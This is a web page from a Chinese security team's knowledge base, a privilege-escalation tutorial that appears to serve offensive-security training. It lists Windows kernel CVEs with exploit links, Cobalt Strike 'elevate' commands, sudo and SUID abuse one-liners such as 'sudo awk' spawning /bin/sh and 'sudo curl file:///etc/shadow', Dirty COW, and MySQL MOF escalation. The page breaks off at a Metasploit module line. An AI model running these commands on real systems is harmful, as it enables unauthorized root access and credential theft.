<!DOCTYPE html>
<html lang="en-US">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, user-scalable=no, initial-scale=1.0, maximum-scale=1.0, minimum-scale=1.0">
    <title>权限提升 | 狼组安全团队公开知识库</title>
    <meta name="description" content="">
    <meta name="generator" content="VuePress 1.7.1">
    <link rel="icon" href="/assets/logo.svg">
    <script type="text/javascript" src="/assets/js/push.js"></script>
    <meta name="description" content="致力于打造信息安全乌托邦">
    <meta name="referrer" content="no-referrer">
    <meta name="keywords" content="知识库,公开知识库,狼组,狼组安全团队知识库,knowledge">
    <link rel="preload" href="/assets/css/0.styles.32ca519c.css" as="style"><link rel="preload" href="/assets/js/app.f7464420.js" as="script"><link rel="preload" href="/assets/js/2.26207483.js" as="script"><link rel="preload" href="/assets/js/61.cd1e3b10.js" as="script"><link rel="prefetch" href="/assets/js/10.55514509.js"><link rel="prefetch" href="/assets/js/11.ec576042.js"><link rel="prefetch" href="/assets/js/12.a5584a2f.js"><link rel="prefetch" href="/assets/js/13.c9f84b2e.js"><link rel="prefetch" href="/assets/js/14.d2a5440c.js"><link rel="prefetch" href="/assets/js/15.2f271296.js"><link rel="prefetch" href="/assets/js/16.0895ce42.js"><link rel="prefetch" href="/assets/js/17.627e2976.js"><link rel="prefetch" href="/assets/js/18.73745a4c.js"><link rel="prefetch" href="/assets/js/19.19350186.js"><link rel="prefetch" href="/assets/js/20.e4eac589.js"><link rel="prefetch" href="/assets/js/21.fc0657ba.js"><link rel="prefetch" href="/assets/js/22.f4a1220f.js"><link rel="prefetch" href="/assets/js/23.c8cce92d.js"><link rel="prefetch" href="/assets/js/24.46225ec2.js"><link rel="prefetch" href="/assets/js/25.9b6d75e4.js"><link rel="prefetch" href="/assets/js/26.288f535e.js"><link rel="prefetch" href="/assets/js/27.865bdc75.js"><link rel="prefetch" href="/assets/js/28.f4224fef.js"><link rel="prefetch" href="/assets/js/29.6393a40b.js"><link rel="prefetch" href="/assets/js/3.a509f503.js"><link rel="prefetch" href="/assets/js/30.d5a49f97.js"><link rel="prefetch" href="/assets/js/31.eb3647df.js"><link rel="prefetch" href="/assets/js/32.7f48a571.js"><link rel="prefetch" href="/assets/js/33.1f374ffa.js"><link rel="prefetch" href="/assets/js/34.5a911179.js"><link rel="prefetch" href="/assets/js/35.d2bcc7ef.js"><link rel="prefetch" href="/assets/js/36.42e440bd.js"><link rel="prefetch" href="/assets/js/37.dedbbdea.js"><link rel="prefetch" href="/assets/js/38.d68d1f69.js"><link rel="prefetch" href="/assets/js/39.e278f860.js"><link rel="prefetch" 
href="/assets/js/4.35636da8.js"><link rel="prefetch" href="/assets/js/40.97f4e937.js"><link rel="prefetch" href="/assets/js/41.38630688.js"><link rel="prefetch" href="/assets/js/42.cae56aa5.js"><link rel="prefetch" href="/assets/js/43.61a04b16.js"><link rel="prefetch" href="/assets/js/44.5c6230f2.js"><link rel="prefetch" href="/assets/js/45.0f1355ae.js"><link rel="prefetch" href="/assets/js/46.c1906649.js"><link rel="prefetch" href="/assets/js/47.7ae220ce.js"><link rel="prefetch" href="/assets/js/48.59af224e.js"><link rel="prefetch" href="/assets/js/49.6a33a171.js"><link rel="prefetch" href="/assets/js/5.08ab40ee.js"><link rel="prefetch" href="/assets/js/50.f14601d2.js"><link rel="prefetch" href="/assets/js/51.f20841fd.js"><link rel="prefetch" href="/assets/js/52.fb0a5327.js"><link rel="prefetch" href="/assets/js/53.8013048c.js"><link rel="prefetch" href="/assets/js/54.d132c2f8.js"><link rel="prefetch" href="/assets/js/55.87aa8b5d.js"><link rel="prefetch" href="/assets/js/56.161f38ad.js"><link rel="prefetch" href="/assets/js/57.bd6a2ef2.js"><link rel="prefetch" href="/assets/js/58.8a69f15a.js"><link rel="prefetch" href="/assets/js/59.93c0e2de.js"><link rel="prefetch" href="/assets/js/6.fda5ce3a.js"><link rel="prefetch" href="/assets/js/60.10091d44.js"><link rel="prefetch" href="/assets/js/62.9c0ad8c5.js"><link rel="prefetch" href="/assets/js/63.4a8dd9d2.js"><link rel="prefetch" href="/assets/js/64.6bf3fede.js"><link rel="prefetch" href="/assets/js/65.7a2ccc50.js"><link rel="prefetch" href="/assets/js/66.874d563b.js"><link rel="prefetch" href="/assets/js/67.bb86eab2.js"><link rel="prefetch" href="/assets/js/68.c1db2a2b.js"><link rel="prefetch" href="/assets/js/69.8141480b.js"><link rel="prefetch" href="/assets/js/7.d1fe6bef.js"><link rel="prefetch" href="/assets/js/70.9fb74c80.js"><link rel="prefetch" href="/assets/js/71.d1e4e9ab.js"><link rel="prefetch" href="/assets/js/72.e6bf83fb.js"><link rel="prefetch" href="/assets/js/73.6dd6c980.js"><link rel="prefetch" 
href="/assets/js/74.3612ba47.js"><link rel="prefetch" href="/assets/js/75.6e1a2434.js"><link rel="prefetch" href="/assets/js/76.5bfa4bcc.js"><link rel="prefetch" href="/assets/js/77.784df031.js"><link rel="prefetch" href="/assets/js/78.aa94a0a0.js"><link rel="prefetch" href="/assets/js/79.c4e9a4f2.js"><link rel="prefetch" href="/assets/js/8.63fd05d7.js"><link rel="prefetch" href="/assets/js/80.8d47d1f7.js"><link rel="prefetch" href="/assets/js/81.1160b022.js"><link rel="prefetch" href="/assets/js/82.7d17e5c8.js"><link rel="prefetch" href="/assets/js/83.a2ff144a.js"><link rel="prefetch" href="/assets/js/84.53d29383.js"><link rel="prefetch" href="/assets/js/9.b49161a4.js">
    <link rel="stylesheet" href="/assets/css/0.styles.32ca519c.css">
  </head>
  <body>
    <div id="app" data-server-rendered="true"><div class="theme-container"><header class="navbar"><div class="ant-row"><div class="nav-button"><i aria-label="icon: bars" class="anticon anticon-bars"><svg viewBox="0 0 1024 1024" focusable="false" data-icon="bars" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M912 192H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zm0 284H328c-4.4 0-8 3.6-8 8v56c0 4.4 3.6 8 8 8h584c4.4 0 8-3.6 8-8v-56c0-4.4-3.6-8-8-8zM104 228a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0zm0 284a56 56 0 1 0 112 0 56 56 0 1 0-112 0z"></path></svg></i> <span></span></div> <div class="ant-col ant-col-xs-24 ant-col-sm-24 ant-col-md-6 ant-col-lg-5 ant-col-xl-5 ant-col-xxl-4"><a href="/" class="router-link-active home-link"><img src="/assets/logo.svg" alt="狼组安全团队公开知识库" class="logo"> <span class="site-name">狼组安全团队公开知识库</span></a> <div class="search-box mobile-search"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div></div> <div class="ant-col ant-col-xs-0 ant-col-sm-0 ant-col-md-18 ant-col-lg-19 ant-col-xl-19 ant-col-xxl-20"><div class="search-box"><input aria-label="Search" autocomplete="off" spellcheck="false" value=""> <!----></div> <nav class="nav-links can-hide"><ul role="menu" id="nav" class="ant-menu ant-menu-horizontal ant-menu-root ant-menu-light"><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/" class="router-link-active">
          首页
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/guide/">
          使用指南
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/knowledge/" class="router-link-active">
          知识库
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="display:none;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li><li role="menuitem" class="ant-menu-item"><a href="/opensource/">
          开源项目
        </a></li><li role="menuitem" class="ant-menu-submenu ant-menu-submenu-horizontal ant-menu-overflowed-submenu" style="visibility:hidden;position:absolute;"><div aria-haspopup="true" class="ant-menu-submenu-title"><span>···</span><i class="ant-menu-submenu-arrow"></i></div></li></ul> <a href="https://github.com/wgpsec" target="_blank" rel="noopener noreferrer" class="repo-link"><i aria-label="icon: github" class="anticon anticon-github"><svg viewBox="64 64 896 896" focusable="false" data-icon="github" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M511.6 76.3C264.3 76.2 64 276.4 64 523.5 64 718.9 189.3 885 363.8 946c23.5 5.9 19.9-10.8 19.9-22.2v-77.5c-135.7 15.9-141.2-73.9-150.3-88.9C215 726 171.5 718 184.5 703c30.9-15.9 62.4 4 98.9 57.9 26.4 39.1 77.9 32.5 104 26 5.7-23.5 17.9-44.5 34.7-60.8-140.6-25.2-199.2-111-199.2-213 0-49.5 16.3-95 48.3-131.7-20.4-60.5 1.9-112.3 4.9-120 58.1-5.2 118.5 41.6 123.2 45.3 33-8.9 70.7-13.6 112.9-13.6 42.4 0 80.2 4.9 113.5 13.9 11.3-8.6 67.3-48.8 121.3-43.9 2.9 7.7 24.7 58.3 5.5 118 32.4 36.8 48.9 82.7 48.9 132.3 0 102.2-59 188.1-200 212.9a127.5 127.5 0 0 1 38.1 91v112.5c.8 9 0 17.9 15 17.9 177.1-59.7 304.6-227 304.6-424.1 0-247.2-200.4-447.3-447.5-447.3z"></path></svg></i></a></nav></div></div> <!----></header> <aside class="sidebar"><div><div class="promo"><div id="promo_3"><div class="promo_title">赞助商</div> <button type="button" class="ant-btn ant-btn-primary ant-btn-background-ghost"><span>成为赞助商</span></button></div></div> <div role="separator" id="reset-margin" class="ant-divider ant-divider-horizontal ant-divider-dashed"></div></div> <ul class="sidebar-links"><li><a href="/knowledge/" aria-current="page" title="知识库广告位招租" class="sidebar-link">知识库广告位招租</a></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>CTF</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" 
data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>基础知识</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>工具手册</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>Web安全</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> 
<!----></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading open"><span>攻防对抗</span> <span class="arrow down"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <ul class="sidebar-links sidebar-group-items"><li><a href="/knowledge/hw/" aria-current="page" title="分类简介" class="sidebar-link">分类简介</a></li><li><a href="/knowledge/hw/border-info.html" title="互联网边界打点" class="sidebar-link">互联网边界打点</a></li><li><a href="/knowledge/hw/agent.html" title="构建通道漫游内网" class="sidebar-link">构建通道漫游内网</a></li><li><a href="/knowledge/hw/host-survival-domain.html" title="域内主机存活探测" class="sidebar-link">域内主机存活探测</a></li><li><a href="/knowledge/hw/intradomain-port.html" title="域内主机端口探测方法" class="sidebar-link">域内主机端口探测方法</a></li><li><a href="/knowledge/hw/to-root.html" aria-current="page" title="权限提升" class="active sidebar-link">权限提升</a></li><li><a href="/knowledge/hw/hold-root.html" title="权限维持" class="sidebar-link">权限维持</a></li><li><a href="/knowledge/hw/transverse.html" title="内网横向移动技巧" class="sidebar-link">内网横向移动技巧</a></li><li><a href="/knowledge/hw/log-action.html" title="日志处理" class="sidebar-link">日志处理</a></li><li><a href="/knowledge/hw/2020-defend-tips.html" title="【防守方】2020攻防演练防守心得" class="sidebar-link">【防守方】2020攻防演练防守心得</a></li><li><a href="/knowledge/hw/windows-emergency-response.html" title="【防守方】Windows应急响应" class="sidebar-link">【防守方】Windows应急响应</a></li><li><a href="/knowledge/hw/linux-emergency-response.html" title="【防守方】Linux应急响应" class="sidebar-link">【防守方】Linux应急响应</a></li><li><a href="/knowledge/hw/kill-webshell.html" title="【防守方】Webshell排查" 
class="sidebar-link">【防守方】Webshell排查</a></li><li><a href="/knowledge/hw/purple-team.html" title="【裁判方】紫队视角看2020年络网络攻防实战演习" class="sidebar-link">【裁判方】紫队视角看2020年络网络攻防实战演习</a></li></ul></section></li><li><section class="sidebar-group collapsable depth-0"><p class="sidebar-heading"><span>代码审计</span> <span class="arrow right"><i aria-label="icon: down" class="anticon anticon-down"><svg viewBox="64 64 896 896" focusable="false" data-icon="down" width="1em" height="1em" fill="currentColor" aria-hidden="true"><path d="M884 256h-75c-5.1 0-9.9 2.5-12.9 6.6L512 654.2 227.9 262.6c-3-4.1-7.8-6.6-12.9-6.6h-75c-6.5 0-10.3 7.4-6.5 12.7l352.6 486.1c12.8 17.6 39 17.6 51.7 0l352.6-486.1c3.9-5.3.1-12.7-6.4-12.7z"></path></svg></i></span></p> <!----></section></li></ul></aside> <main class="page"> <div class="theme-antdocs-content content__default"><h2 id="提权的基础概念">提权的基础概念 <a href="#提权的基础概念" class="header-anchor">#</a></h2> <p><strong>Windows上常见的权限分类：</strong></p> <blockquote><p>User：普通用户权限；</p> <p>Administrator：管理员权限；</p> <p>System：系统权限。</p></blockquote> <p><strong>Linux上权限分类：</strong></p> <blockquote><p>User：普通用户权限；</p> <p>www-data：Web服务的权限，比User还要低，一般通过Web漏洞获取的Webshell就是这个权限；</p> <p>root：Linux系统最高权限。</p></blockquote> <p><strong>纵向提权</strong>：低权限角色获取高权限角色的权限。</p> <p><strong>横向提权</strong>：在系统A中获取了系统B中同级别的角色权限。</p> <p><strong>常用的提权方法</strong>：</p> <p>系统内核溢出漏洞提权、服务器中间件漏洞提权、数据库提权、其它第三方组件提权（利用率较高）。</p> <p>利用windows系统错误配置提权（可信服务路径漏洞，组策略首选项等）</p> <h2 id="windows提权">Windows提权 <a href="#windows提权" class="header-anchor">#</a></h2> <p><strong>LOLBAS</strong>（计划任务、文件传输、本地提权） https://lolbas-project.github.io/</p> <h3 id="内核漏洞提权">内核漏洞提权 <a href="#内核漏洞提权" class="header-anchor">#</a></h3> <table><thead><tr><th style="text-align:left;">漏洞代号</th> <th style="text-align:left;">补丁编号</th> <th style="text-align:left;">适用平台</th> <th style="text-align:left;">用途</th></tr></thead> <tbody><tr><td style="text-align:left;">MS14-058</td> <td style="text-align:left;">KB3000061</td> <td 
style="text-align:left;">03，08，12，Win7</td> <td style="text-align:left;">本地提权</td></tr> <tr><td style="text-align:left;">MS14-068</td> <td style="text-align:left;">KB3011780</td> <td style="text-align:left;">域控未安装补丁的域内，03，08，12</td> <td style="text-align:left;">域内提权</td></tr> <tr><td style="text-align:left;">MS15-051</td> <td style="text-align:left;">KB3057191</td> <td style="text-align:left;">03，08，12，Win7</td> <td style="text-align:left;">本地提权</td></tr> <tr><td style="text-align:left;">MS16-032</td> <td style="text-align:left;">KB3143141</td> <td style="text-align:left;">08 r2以后，12，Win7</td> <td style="text-align:left;">本地提权</td></tr> <tr><td style="text-align:left;">MS17-010</td> <td style="text-align:left;">KB4013389</td> <td style="text-align:left;">03，08，12，16，win7</td> <td style="text-align:left;">远程注入dll</td></tr> <tr><td style="text-align:left;">CVE-2020-0787</td> <td style="text-align:left;"></td> <td style="text-align:left;">all</td> <td style="text-align:left;">windows全版本提权</td></tr> <tr><td style="text-align:left;">CVE-2020-1472</td> <td style="text-align:left;"></td> <td style="text-align:left;">domain</td> <td style="text-align:left;">域内提权</td></tr></tbody></table> <p><strong>快速检测目标系统未打漏洞补丁</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>systeminfo <span class="token operator">&gt;</span> temp.txt<span class="token operator">&amp;</span><span class="token punctuation">(</span>for %i <span class="token keyword">in</span> <span class="token punctuation">(</span>KB3000061 KB3011780 KB3057191 KB3143141 KB4013389<span class="token punctuation">)</span> <span class="token keyword">do</span> @type temp.txt<span class="token operator">|</span>@find /i  <span class="token string">&quot;%i&quot;</span><span class="token operator">||</span> @echo %i Not Installed<span class="token operator">!</span><span class="token punctuation">)</span><span class="token operator">&amp;</span>del /f /q /a temp.txt
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>补丁号根据自己需求加，<code>MSF</code> 中有相关EXP，或者自行搜索 Github、searchsploit</p> <p><strong>CVE-2020-0787</strong></p> <p>直接下载EXP到目标主机上执行（需要上桌面，会弹出一个system权限的cmd窗口）</p> <p>https://github.com/cbwang505/CVE-2020-0787-EXP-ALL-WINDOWS-VERSION</p> <p><strong>CVE-2020-1472</strong></p> <p>POC：https://github.com/dirkjanm/CVE-2020-1472</p> <p>Test-EXP：https://github.com/SecuraBV/CVE-2020-1472/</p> <p>推荐把py打包成exe使用，虽然体积大点但是比装py环境方便</p> <h3 id="利用cobalt-strike提权">利用Cobalt Strike提权 <a href="#利用cobalt-strike提权" class="header-anchor">#</a></h3> <p>Cobalt Strike 附带了一些绕过 <code>UAC</code> 的攻击，但如果当前用户不是管理员(Administrator)，攻击会失效。</p> <p>Beacon默认回连时间（心跳时间）为60秒，为了更快地渗透可以修改成0秒，即交互模式。</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sleep</span> <span class="token number">0</span>	
<span class="token comment">#心跳时间设快了容易被发现，实际攻击不建议设太快</span>

shell <span class="token function">whoami</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><p><strong>1、如果你有一个Administrator权限的Beacon，用以下命令提升到SYSTEM权限：</strong></p> <p>这个需要创建服务</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>elevate svc-exe test1（你的监听器）
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>2、如果你是普通<code>本地</code>用户权限，用以下命令提升到高权限</strong></p> <p>注意：如果是<code>域</code>用户会弹出认证窗口，不能提权</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>elevate uac-token-duplication test1
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>然后可以用上边的<code>svc-exe</code>再提权到SYSTEM</p> <h3 id="c-版的烂土豆-来自qax零队">C#版的烂土豆（来自QAX零队） <a href="#c-版的烂土豆-来自qax零队" class="header-anchor">#</a></h3> <p>实测Win7、Win8、08、12等可用</p> <p>项目地址：https://github.com/uknowsec/SweetPotato</p> <p>直接在Webshell下执行</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>SweetPotato.exe -a <span class="token function">whoami</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h2 id="linux提权">Linux提权 <a href="#linux提权" class="header-anchor">#</a></h2> <p><strong>GTFOBins</strong>（sudo滥用和SUID提权命令查询）https://gtfobins.github.io/</p> <h3 id="密码复用">密码复用 <a href="#密码复用" class="header-anchor">#</a></h3> <p>如数据库、后台 web 密码，可能就是 root 密码</p> <h3 id="内核溢出漏洞提权">内核溢出漏洞提权 <a href="#内核溢出漏洞提权" class="header-anchor">#</a></h3> <p>1、信息收集</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">uname</span> -a	<span class="token comment">#查看系统版本内核信息</span>

<span class="token comment">#centos</span>
hostnamectl	<span class="token comment">#查看系统版本内核详细信息，推荐这个命令</span>

<span class="token comment">#ubuntu</span>
lsb_release -a
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br><span class="line-number">6</span><br><span class="line-number">7</span><br></div></div><p>2、使用 <code>searchsploit</code> 查找相关内核漏洞</p> <p>下载地址：https://github.com/offensive-security/exploitdb</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>searchsploit linux <span class="token number">3.10</span> CentOS Linux <span class="token number">7</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>例如经典的<strong>脏牛提权</strong>~可以用Vulnhub的lampiao这个靶机去做实验</p> <p>下载脏牛：https://github.com/gbonacini/CVE-2016-5195</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>./dcow -s
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>问题记录：</p> <p>Win10子系统的 g++编译环境安装一直报错，最终发现 Ubuntu 20.04.1 LTS 版本跟apt源不匹配，使用最新的阿里源即可
编译好后又报错cannot execute binary file: Exec format error，原因是系统版本和g++版本差异造成的，将源码上传到目标系统编译执行，成功执行</p> <h3 id="sudo滥用">sudo滥用 <a href="#sudo滥用" class="header-anchor">#</a></h3> <p><code>/etc/sudoers</code>文件定义可以执行 sudo 的账户、定义某个应用程序用 root 访问、是否需要密码验证</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> -l	<span class="token comment">#查看当前用户可以sudo的程序</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p><strong>AWK：</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> <span class="token function">awk</span> <span class="token string">'BEGIN {system(&quot;/bin/sh&quot;)}'</span>	
<span class="token comment">#通过生成交互式系统外Shell来脱离受限环境，需要普通用户的密码</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><p><strong>CURL：</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">sudo</span> <span class="token function">curl</span> file:///etc/shadow
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><h3 id="suid提权">SUID提权 <a href="#suid提权" class="header-anchor">#</a></h3> <p>SUID 是一种特殊的文件属性，它允许用户执行的文件以该文件的拥有者的身份运行</p> <p>【ls -l 查看时，权限位中带有 s 标志的文件才设置了 SUID】</p> <p>1、查找系统上所有属主为 root 且设置了 SUID 位的可执行文件</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token function">find</span> / -user root -perm -4000 -print <span class="token operator"><span class="token file-descriptor important">2</span>&gt;</span>/dev/null
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br></div></div><p>2、比如发现了find</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#随便新建一个文件，或利用已有文件</span>
<span class="token function">touch</span> abc

<span class="token comment">#以SUID即root权限执行命令</span>
<span class="token function">find</span> abc -exec whoami <span class="token punctuation">\</span><span class="token punctuation">;</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p>3、例子 {nmap SUID提权}</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#2.02 to 5.21版本 用交互模式执行shell命令</span>

<span class="token function">sudo</span> nmap --interactive		
nmap<span class="token operator">&gt;</span> <span class="token operator">!</span>sh
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br></div></div><h3 id="su-root被禁止登录-获取交互shell">su root被禁止登录（获取交互shell） <a href="#su-root被禁止登录-获取交互shell" class="header-anchor">#</a></h3> <blockquote><p>拿到 root 密码，端口转发，代理，但防火墙禁止其他人登录 root；</p> <p>用原来的低权限 shell，也无法 sudo 切换 root</p> <p>因为出于安全考虑，linux 要求用户必须从终端设备（tty）中输入密码，而不是标准输入（stdin）</p> <p>所以 sudo 在你输入密码的时候本质上是读取了键盘，而不是读取 bash 里面输入的字符</p></blockquote> <p><strong>利用python获取交互Shell</strong></p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code>python -c <span class="token string">'import pty;pty.spawn(&quot;/bin/sh&quot;)'</span>
<span class="token function">sudo</span> <span class="token function">su</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br></div></div><h2 id="数据库提权">数据库提权 <a href="#数据库提权" class="header-anchor">#</a></h2> <p>以下数据库提权方法 <code>server 2003</code>之前的系统才可用</p> <h3 id="mysql数据库提权">MySQL数据库提权 <a href="#mysql数据库提权" class="header-anchor">#</a></h3> <p><strong>MOF提权</strong></p> <p>MOF文件是mysql数据库的扩展文件（在c:/windows/system32/wbem/mof/nullevt.mof）</p> <p>叫做”托管对象格式”，其作用是每隔五秒就会去监控进程创建和死亡</p> <p><strong>利用条件：</strong></p> <blockquote><p><code>Windows&lt;=2003</code></p> <p>mysql在c:/windows/system32/wbem/mof目录有写权限</p> <p>已知数据库root账号密码</p> <p>数据库允许外连</p> <p>secure_file_priv为空</p></blockquote> <p>当<code>secure_file_priv</code>的值没有具体值时，表示不对<code>MySQL</code>的导入|导出做限制，如果是null，表示<code>MySQL</code>不允许导入导出</p> <div class="language-bash line-numbers-mode"><pre class="language-bash"><code><span class="token comment">#查看secure_file_priv的值</span>
SHOW VARIABLES LIKE <span class="token string">&quot;secure_file_priv&quot;</span><span class="token punctuation">;</span>

<span class="token comment">#这个值可以在my.ini设置为空</span>
secure_file_priv <span class="token operator">=</span>
</code></pre> <div class="line-numbers-wrapper"><span class="line-number">1</span><br><span class="line-number">2</span><br><span class="line-number">3</span><br><span class="line-number">4</span><br><span class="line-number">5</span><br></div></div><p><strong>提权原理：</strong></p> <blockquote><p>MOF文件既然每五秒就会执行，而且是系统权限；</p> <p>我们通过mysql将文件写入一个MOF文件替换掉原有的MOF文件；</p> <p>然后系统每隔五秒就会执行一次我们上传的MOF。</p> <p>MOF当中有一段是vbs脚本，我们可以通过控制这段vbs脚本的内容让系统执行命令，进行提权。</p></blockquote> <p>这个提权方式条件非常严苛，数据库在system32写文件这个条件一般很难达到，而且较新的系统无法使用MOF提权。</p> <p><strong>MSF 下有Mof 提权模块</strong></p> <p>执行成功后会直接反弹一个 <code>system</code>权限的meterpreter 。</p> <div class="language- line-numbers-mode"><pre class="language-text"><code>use exploit/windows/mysql/mysql_mof
